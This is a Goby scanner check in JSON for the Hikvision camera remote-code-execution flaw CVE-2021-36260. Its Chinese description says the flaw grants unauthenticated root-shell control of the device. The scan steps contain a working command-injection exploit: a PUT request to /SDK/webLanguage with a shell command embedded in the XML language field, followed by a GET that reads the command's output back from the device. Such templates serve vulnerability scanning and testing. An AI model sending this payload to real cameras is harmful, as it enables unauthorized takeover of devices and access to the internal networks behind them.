Goby/json/Hikvision_RCE_CVE_2021_3626...


{
"Name": "Hikvision RCE CVE-2021-36260",
"Level": "3",
"Tags": [
"rce"
],
"GobyQuery": "app=\"Hikvision-Cameras-and-Surveillance\"",
"Description": "攻击者利用该漏洞可以用无限制的root shell来完全控制设备,即使设备的所有者受限于有限的受保护shell(psh)。除了入侵IP摄像头外,还可以访问和攻击内部网络。\n该漏洞的利用并不需要用户交互,攻击者只需要访问http或HTTPS服务器端口(80/443)即可利用该漏洞,无需用户名、密码、以及其他操作。摄像头本身也不会检测到任何登录信息。",
"Product": "hikvision",
"Homepage": "https://www.hikvision.com/cn/",
"Author": "aetkrad",
"Impact": "",
"Recommendation": "",
"References": [
"https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html"
],
"HasExp": false,
"ExpParams": null,
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/",
"follow_redirect": false,
"header": null,
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
}
]
},
"SetVariable": [
"output|lastheader|regex|"
]
},
{
"Request": {
"method": "PUT",
"uri": "/SDK/webLanguage",
"follow_redirect": false,
"header": {
"X-Requested-With": "XMLHttpRequest",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"
},
"data_type": "text",
"data": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<language>$(ls -l >webLib/c)</language>",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "500",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|"
]
},
{
"Request": {
"method": "GET",
"uri": "/c",
"follow_redirect": false,
"header": null,
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody||"
]
}
],
"PostTime": "2021-11-17 13:28:08",
"GobyVersion": "1.8.302"
}